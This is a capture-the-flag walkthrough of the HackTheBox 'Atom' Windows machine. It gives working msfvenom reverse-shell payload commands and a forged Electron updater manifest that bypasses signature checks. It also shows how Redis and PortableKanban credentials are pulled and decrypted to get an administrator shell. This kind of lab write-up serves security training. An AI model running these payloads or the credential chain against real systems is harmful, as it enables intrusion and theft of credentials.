In this walk through, we will be going through the Atom room from HackTheBox. This room is rated as Medium on the platform and it consists of exploitation of an Electron application to get initial access and for privilege escalation, exploitation of PortableKanban is required to get root. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Atom |
IPaddress | 10.10.10.237 |
Difficulty | Medium |
OS | Windows |
Description | Atom is a Medium Windows machine that requires exploitation of a RCE in Electron software to get the foothold. For privilege escalation, PortableKanban was exploited to get root. |
Enumeration:
- I started off with my regular aggressive nmap scan and found a couple of ports opened – 80, 443 (HTTP/HTTPS), 135 (RPC) and 445 (SMB).
$ sudo nmap -A 10.10.10.237 [sudo] password for wh1terose: Nmap scan report for 10.10.10.237 Host is up (0.22s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: Heed Solutions | vulners: | cpe:/a:apache:http_server:2.4.46: | PACKETSTORM:171631 7.5 https://vulners.com/packetstorm/PACKETSTORM:171631 *EXPLOIT* | EDB-ID:51193 7.5 https://vulners.com/exploitdb/EDB-ID:51193 *EXPLOIT* | CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813 | CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943 | CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720 | CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790 | CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275 | CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691 | CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123 | CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225 | CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386 | 1337DAY-ID-38427 7.5 https://vulners.com/zdt/1337DAY-ID-38427*EXPLOIT* | FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT* | CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438 | CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452 | CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224 | AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C 6.8 https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C *EXPLOIT* | 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT* | 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT* | 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT* | 36618CA8-9316-59CA-B748-82F15F407C4F 6.8 https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F *EXPLOIT* | 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT* | OSV:BIT-2023-31122 6.4 https://vulners.com/osv/OSV:BIT-2023-31122 | CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615 | CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224 | CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721 | CVE-2022-36760 5.1 https://vulners.com/cve/CVE-2022-36760 | OSV:BIT-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-2023-45802 | OSV:BIT-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-2023-43622 | F7F6E599-CEF4-5E03-8E10-FE18C4101E38 5.0 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT* | E5C174E5-D6E8-56E0-8403-D287DE52EB3F 5.0 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT* | DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 5.0 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT* | CVE-2022-37436 5.0 https://vulners.com/cve/CVE-2022-37436 | CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556 | CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404 | CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614 | CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377 | CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719 | CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160 | CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798 | CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193 | CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641 | CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690 | CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490 | CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950 | CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567 | CVE-2006-20001 5.0 https://vulners.com/cve/CVE-2006-20001 | CNVD-2023-93320 5.0 https://vulners.com/cnvd/CNVD-2023-93320 | CNVD-2023-80558 5.0 https://vulners.com/cnvd/CNVD-2023-80558 | CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122 | CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584 | CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582 | CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223 | C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B 5.0 https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B *EXPLOIT* | BD3652A9-D066-57BA-9943-4E34970463B9 5.0 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT* | B0208442-6E17-5772-B12D-B5BE30FA5540 5.0 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT* | A820A056-9F91-5059-B0BC-8D92C7A31A52 5.0 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT* | 9814661A-35A4-5DB7-BB25-A1040F365C81 5.0 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT* | 5A864BCC-B490-5532-83AB-2E4109BB3C31 5.0 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT* |_ 17C6AD2A-8469-56C8-BBBE-1764D0DF1680 5.0 https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680 *EXPLOIT* 135/tcp open msrpc Microsoft Windows RPC 443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: Heed Solutions | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 | vulners: | cpe:/a:apache:http_server:2.4.46: | PACKETSTORM:171631 7.5 https://vulners.com/packetstorm/PACKETSTORM:171631 *EXPLOIT* | EDB-ID:51193 7.5 https://vulners.com/exploitdb/EDB-ID:51193 *EXPLOIT* | CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813 | CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943 | CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720 | CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790 | CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275 | CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691 | CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123 | CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225 | CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386 | 1337DAY-ID-38427 7.5 https://vulners.com/zdt/1337DAY-ID-38427*EXPLOIT* | FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT* | CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438 | CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452 | CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224 | AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C 6.8 https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C *EXPLOIT* | 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT* | 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT* | 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT* | 36618CA8-9316-59CA-B748-82F15F407C4F 6.8 https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F *EXPLOIT* | 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT* | OSV:BIT-2023-31122 6.4 https://vulners.com/osv/OSV:BIT-2023-31122 | CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615 | CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224 | CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721 | CVE-2022-36760 5.1 https://vulners.com/cve/CVE-2022-36760 | OSV:BIT-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-2023-45802 | OSV:BIT-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-2023-43622 | F7F6E599-CEF4-5E03-8E10-FE18C4101E38 5.0 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT* | E5C174E5-D6E8-56E0-8403-D287DE52EB3F 5.0 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT* | DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 5.0 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT* | CVE-2022-37436 5.0 https://vulners.com/cve/CVE-2022-37436 | CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556 | CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404 | CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614 | CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377 | CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719 | CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160 | CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798 | CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193 | CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641 | CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690 | CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490 | CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950 | CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567 | CVE-2006-20001 5.0 https://vulners.com/cve/CVE-2006-20001 | CNVD-2023-93320 5.0 https://vulners.com/cnvd/CNVD-2023-93320 | CNVD-2023-80558 5.0 https://vulners.com/cnvd/CNVD-2023-80558 | CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122 | CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584 | CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582 | CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223 | C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B 5.0 https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B *EXPLOIT* | BD3652A9-D066-57BA-9943-4E34970463B9 5.0 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT* | B0208442-6E17-5772-B12D-B5BE30FA5540 5.0 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT* | A820A056-9F91-5059-B0BC-8D92C7A31A52 5.0 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT* | 9814661A-35A4-5DB7-BB25-A1040F365C81 5.0 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT* | 5A864BCC-B490-5532-83AB-2E4109BB3C31 5.0 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT* |_ 17C6AD2A-8469-56C8-BBBE-1764D0DF1680 5.0 https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680 *EXPLOIT* 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows XP|7 (86%) OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7 Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h40m01s, deviation: 4h37m09s, median: 0s | smb-os-discovery: | OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3) | OS CPE: cpe:/o:microsoft:windows_10::- | Computer name: ATOM | NetBIOS computer name: ATOM\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2023-12-20T08:19:01-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2023-12-20T16:19:02 |_ start_date: N/A TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 216.79 ms 10.10.14.1 2 217.48 ms 10.10.10.237 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 76.16 seconds
- I also performed an alternate all ports nmap scan to see if i missed something and got two more interesting entries – 5985 (WinRM) and 6379 (Redis).
sudo nmap -sS -p- -T5 10.10.10.237
- Enumerated the web server on port 443 and found a static website for a software solution company. The “Download for Windows” button downloads a zip file containing the software’s binary. Apart from the, the footer section reveals a potential username – MrR3boot.
- Fired gobuster on the webserver, found a bunch of directories but nothing interesting enough.
gobuster dir -k -u http://10.10.10.237/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
- Next, pivoted my enumeration to SMB. List the shares with NULL authentication and found an interesting one – Sotware_Updates.
smbclient -L 10.10.10.237
- Accessed the share and download the UAT_Testing_Procedures.pdf file lying there.
$ smbclient //10.10.10.237/Software_Updates Password for [WORKGROUP\wh1terose]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Dec 20 22:23:31 2023 .. D 0 Wed Dec 20 22:23:31 2023 client1 D 0 Wed Dec 20 22:23:31 2023 client2 D 0 Wed Dec 20 22:23:31 2023 client3 D 0 Wed Dec 20 22:23:31 2023 UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 16:48:08 2021 4413951 blocks of size 4096. 1367645 blocks available smb: \> prompt off smb: \> recurse on smb: \> mget * getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (32.8 KiloBytes/sec) (average 32.8 KiloBytes/sec)
- Upon peeking inside the PDF file reveals the QA process that is used by the company for any new update related to the binary. For that, we have to put the file in one of the clients folder and one of the QA will test and check it. That means, if we can trick the QA to execute our payload instead of the real updated binary, then we can get an initial foothold on to the system.
- I also executed the binary using wine to see if it got something interesting but found nothing inside it.
wine heedv1\ Setup\ 1.0.0.exe
- Next, i checked if we can write to the client folder by putting a test file on it.
$ touch test $ smbclient //10.10.10.237/Software_Updates Password for [WORKGROUP\wh1terose]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Dec 20 22:33:42 2023 .. D 0 Wed Dec 20 22:33:42 2023 client1 D 0 Wed Dec 20 22:33:42 2023 client2 D 0 Wed Dec 20 22:33:42 2023 client3 D 0 Wed Dec 20 22:33:42 2023 UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 16:48:08 2021 4413951 blocks of size 4096. 1368383 blocks available smb: \> cd client1 smb: \client1\> put test putting file test as \client1\test (0.0 kb/s) (average 0.0 kb/s) smb: \client1\> ls . D 0 Wed Dec 20 22:33:53 2023 .. D 0 Wed Dec 20 22:33:53 2023 test A 0 Wed Dec 20 22:33:53 2023 4413951 blocks of size 4096. 1368383 blocks available smb: \client1\>
Initial Access:
- The concerned application is build with electron. I looked online for any known vulnerability for the electron updater or builder and found one. It seems like we have a Electron update signature bypass vulnerability here. That means, we can bypass the signature used to sign the update the binary and thus can fool the victim into believing that it is a legit update.
Resource: https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
version: 1.2.3 files: - url: v’ulnerable-app-setup-1.2.3.exe sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA== size: 44653912 path: v'ulnerable-app-1.2.3.exe sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA== releaseDate: '2019-11-20T11:17:02.627Z
- I first created a meterpreter payload with msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f exe > heed_update.exe
- Calculated its SHA512 hash and encoded it in base64.
sha512sum heed_update.exe | cut -d ' ' -f1 | xxd -r -p | base64 -w0 cvHPi57NWCWTzW04s+OjyTbZKR5hvqO3XZPo/0eIiAXBGGrp3QTkyEYT7o+WUQFJct7D905glGWr1421O/5UqA==
- Next, i generate a latest.yml file with below contents that has the file name, size and SHA512 hash of it.
version: 1.0.1 files: - url: h'eed_update.exe sha512: cvHPi57NWCWTzW04s+OjyTbZKR5hvqO3XZPo/0eIiAXBGGrp3QTkyEYT7o+WUQFJct7D905glGWr1421O/5UqA== size: 73984 path: h'eed_update.exe sha512: cvHPi57NWCWTzW04s+OjyTbZKR5hvqO3XZPo/0eIiAXBGGrp3QTkyEYT7o+WUQFJct7D905glGWr1421O/5UqA==
- Changed the file name to the below one.
mv heed_update.exe h\'eed_update.exe
- Started my Metasploit multi handler and uploaded the binary and yaml file to the share.
$ smbclient //10.10.10.237/Software_Updates Password for [WORKGROUP\wh1terose]: Try "help" to get a list of possible commands. smb: \> cd client1 smb: \client1\> put latest.yml putting file latest.yml as \client1\latest.yml (0.4 kb/s) (average 0.4 kb/s) smb: \client1\> put "h'eed_update.exe" putting file h'eed_update.exe as \client1\h'eed_update.exe (57.6 kb/s) (average 38.6 kb/s) smb: \client1\> exit
- At this point, i was unable to get a callback from the target to my listener. I figured out that there could be a size issue with the binary as meterpreter payload generally of larger size. I recreated another payload, this time a generic reverse shell.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f exe > shell.exe
- Calculated its SHA512 hash like before.
sha512sum shell.exe | cut -d ' ' -f1 | xxd -r -p | base64 -w0 XlmczZbx9YoVRqq2Xw3OdhiCd65xv0bFnrJrszzfB8VRsZrPl7JFw7/orLIEhluYtMrb2V50rqm6sE23PgotVQ==
- Added it to the latest.yml file.
version: 1.0.1 files: - url: s'hell.exe sha512: XlmczZbx9YoVRqq2Xw3OdhiCd65xv0bFnrJrszzfB8VRsZrPl7JFw7/orLIEhluYtMrb2V50rqm6sE23PgotVQ== size: 7168 path: s'hell.exe sha512: XlmczZbx9YoVRqq2Xw3OdhiCd65xv0bFnrJrszzfB8VRsZrPl7JFw7/orLIEhluYtMrb2V50rqm6sE23PgotVQ==
- Changed the payload name.
mv shell.exe s\'hell.exe
- Uploaded the payload along with the yml file to the share.
$ smbclient //10.10.10.237/Software_Updates Password for [WORKGROUP\wh1terose]: Try "help" to get a list of possible commands. smb: \> cd client1 smb: \client1\> put latest.yml putting file latest.yml as \client1\latest.yml (0.4 kb/s) (average 0.4 kb/s) smb: \client1\> put s'hell.exe putting file s'hell.exe as \client1\s'hell.exe (11.2 kb/s) (average 5.5 kb/s) smb: \client1\> exit
- Got a connection back within a minute as user Jason at my netcat listener.
nc -lvnp 4444
- Captured the user flag.
Privilege Escalation:
- Next, i wandered around the file system and found an interesting folder in Jason’s Downloads directory – PortableKanban. I looked online for it and it seems like it is a task management tool.
- Looked for any privilege escalation exploits for it and got one – PortableKanban Encrypted Password retrieval. The exploit decrypts a DES password with a known key and it requires a PortableKanban.pk3 file as an argument. As per the below output, we have a PortableKanban.pk3.lock file in it.
- Moved the file to the Software_updates directory. So that we can download it via SMB to our local machine.
- Next, used the below exploit to extract the password from the file. However, got hit by an error.
Exploit: https://www.exploit-db.com/exploits/49409
- Peeked inside the PortableKanban.pk3.lock file and it seems like it is calling for the executable file in the PortableKanban directory.
head PortableKanban.pk3.lock
- Back in the PortableKanban directory, i looked inside the cfg file and got an interesting entry there – “DbEncPassword: Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb”
type PortableKanban.cfg
- We know that the server is running redis on it. Used the below command to check for any stored credentials. Found out that we can log into the server as kidvscat_yes_kidvscat without any password.
type redis.windows-service.conf | findstr requirepass
kidvscat_yes_kidvscat: Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb
- Next, i used the redis-cli to log in as kidvscat_yes_kidvscat and extracted the pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0 from it which gives me the DES encrypted admin password.
redis-cli -h 10.10.10.237 auth kidvscat_yes_kidvscat keys * get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
- As per the exploit code, we already know the DES Key that was being used for the decryption.
Admin: Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\
- So, we decrypted the admin’s encrypted password manually using Cyberchef with the known keys.
kidvscat_admin_@123
- At last, used Evil-WinRM to get a shell on the target with the Admin credentials and captured the root flag.
evil-winrm.rb -i 10.10.10.237 -u Administrator -p kidvscat_admin_@123
Also Read: HTB – Active
Conclusion:
So that was “Atom” for you. The machine features a hosting of a Electron software (Electron Builder) where a vulnerability in signature validation can lead to remote command execution and that’s how we got a foothold on system as user jason. By capturing the password of Redis service from configuration file we got the encrypted password of user Administrator. By using exploitation for the PortableKanban the administrator’s password then was decrypted and thus login through winrm was done at the system as root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.